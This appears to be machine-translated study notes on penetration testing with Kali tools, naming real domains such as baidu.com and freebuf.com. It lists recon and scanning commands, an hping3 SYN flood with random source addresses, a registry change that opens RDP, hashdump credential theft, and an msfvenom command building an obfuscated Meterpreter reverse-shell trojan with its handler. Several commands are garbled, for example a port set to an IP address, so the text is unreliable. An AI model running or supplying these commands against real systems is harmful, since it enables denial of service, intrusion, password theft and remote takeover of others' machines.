bettercap ARP spoofing
DNS investigation
dnsmap violence guess solution subdomain
dmitry -wiens -o search.txt baidu.com integrated dns, domain information, subdomain collection set Tools Platform
recon-ng to crack the violence dns subdomain this function well in combination with the best shodan Interface
IPS / IDS identification (Intrusion Detection System)
fragroute www.baidu.com then open the browser will go to the record
lbd baidu.com detection site load balancing situation can only detect nginx now basically been eliminated
wafw00f www.baidu.com waf detection seems not handy
Host enumeration
atk6-alive6 etho (NIC) can only scan IPV6 address of the host in the same local area network
msf framework also have this function
set rhosts ipv6 address
use auxiliary/scanner/discovery/ipv6_multicast_ping
show options
run
Teacher recommended useful tool: hping3
hping3 --icmp -c 2 192.168.1.7 routine testing survival network
hping3 -S --flood --rand-source -p 80 192.168.1.7 flooding attacks
-1 ip hping3
nmap 192.168.1.0/24 survival test on the same subnet
Ports, servers, services scan (nmap)
Fingerprint recognition
System identification
Nmap -You 192.168.0.1
xprobe2 www.freebuf.com -p tcp:80:open
whatweb www.freebuf.com
masscan scale and speed of scanning randomly assigned to host this better
masscan 192.168.1.0/24 -p 80 --banners
Integrated tools: sparta Sparta interface tools add ip (segment) to very good
Vulnerability scanning and use framework openvas
web application attack and audit framework
W3AF installation is not very friendly to run a little card Dayton temporarily do not have much use
msf set of processes
After penetration of important commands: through the registry to add a registry open port 3389: REG ADD HKLM \ SYSTEM \ CurrentControlSet \ Control \ Terminal "" Server / v fDenyTSConnections / t REG_DOWRD / d 00000000 / f
Read the password: search hashdump use a module using the show options set sessions run to obtain the password
Remote Desktop Connection: rdesktop 192.168.0.1:3389
Trojan generation:
-P Msfvenom Windows / Meterpreter / Reverse_tcp -E X86 / Shikata_ga_nai -I 5 LHOST = self-ip LPORT = 4444 -f exe> /root/xiee.exe
Before granting the target host detect what may go online
Then open the monitor module on the attack machine: msf5> use exploit / multi / handler
Setting payload: the SET payload Windows / Meterpreter / reverse_tcp with the Trojans used to generate almost
set your own listening port: set lport 192.168.188.255
open: run
Armitage
Msf of interface cards Dayton and sometimes may be slow